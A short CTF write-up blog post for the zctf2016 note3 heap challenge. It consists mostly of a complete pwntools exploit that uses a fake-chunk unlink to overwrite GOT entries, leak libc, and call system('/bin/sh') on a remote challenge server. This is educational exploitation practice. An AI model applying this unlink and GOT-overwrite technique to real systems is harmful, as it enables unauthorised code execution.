<!-- wp:paragraph -->
<p>This challenge is almost a combination of <strong><span class="external-link"><a class="no-external-link" href="https://www.cjovi.icu/?p=829" target="_blank">zctf2016_note2</a></span></strong> and <strong><a rel="noreferrer noopener" href="https://www.cjovi.icu/?p=810" target="_blank">hitcon2014_stkof</a></strong>. The solution on the wiki feels really complicated, not something a noob like me can understand, so in the end I pwned it by combining the methods from those two challenges. I'll just post the exploit; I don't think there's much to say.</p>
<!-- /wp:paragraph -->

<!-- wp:code -->
<pre class="wp-block-code"><code>#!/usr/bin/env python
# coding=utf-8
from pwn import *

# Menu helpers: option 1 = new note, 3 = edit, 4 = delete
def new_note(size, payload):
    sh.sendlineafter("--->>\n", '1')
    sh.sendlineafter("(less than 1024)\n", str(size))
    sh.sendlineafter("content:\n", payload)

def edit(index, payload):
    sh.sendlineafter("--->>\n", "3")
    sh.sendlineafter("id of the note:\n", str(index))
    sh.sendlineafter("new content:\n", payload)

def free(index):
    sh.sendlineafter("--->>\n", "4")
    sh.sendlineafter("note:\n", str(index))

#sh = process("./note2")
sh = remote("node3.buuoj.cn", "25686")
context(log_level='debug')

note_ptr_array = 0x6020C8
elf = ELF("./zctf_2016_note3")
libc = ELF("./buu-libc-2.23.so")

# Fake chunk inside note 0 whose fd/bk point back at the note pointer array (same setup as note2)
payload = 'a' * 8 + p64(0x61) + p64(note_ptr_array - 0x18) + p64(note_ptr_array - 0x10)
payload += 'a' * 64 + p64(0x60)
new_note(0x80, payload)
new_note(0, 'none')
new_note(0x80, 'none')

free(1)
# Re-allocate note 1 and overwrite the prev_size/size fields of note 2
payload = 'a' * 16 + p64(0x90 + 0x20 - 0x10) + p64(0x90)
new_note(0, payload)
free(2)   # unlink: the note pointer array now points into itself

# note 0 -> free@got, notes 1 and 2 -> atoi@got
payload = 'a' * 0x18 + p64(elf.got["free"]) + p64(elf.got["atoi"]) * 2
edit(0, payload)
edit(0, p64(elf.symbols["puts"])[:-1])   # free@got = puts (as in stkof)
free(1)                                  # puts(atoi@got) leaks a libc address
atoi_addr = u64(sh.recv(6).ljust(8, '\x00'))
system_addr = atoi_addr - libc.symbols["atoi"] + libc.symbols["system"]
edit(2, p64(system_addr))                # atoi@got = system
sh.sendlineafter("--->>\n", '/bin/sh')   # atoi("/bin/sh") -> system("/bin/sh")
sh.interactive()
</code></pre>
<!-- /wp:code -->

<!-- wp:paragraph -->
<p>Honestly they are almost identical; that year, pwning one of these two challenges probably got you the other one too. Thinking about it, I'm a little curious whether there is a note1.</p>
<!-- /wp:paragraph -->

<p>Last modified: 2021-01-02. © Reposting permitted with proper attribution.</p>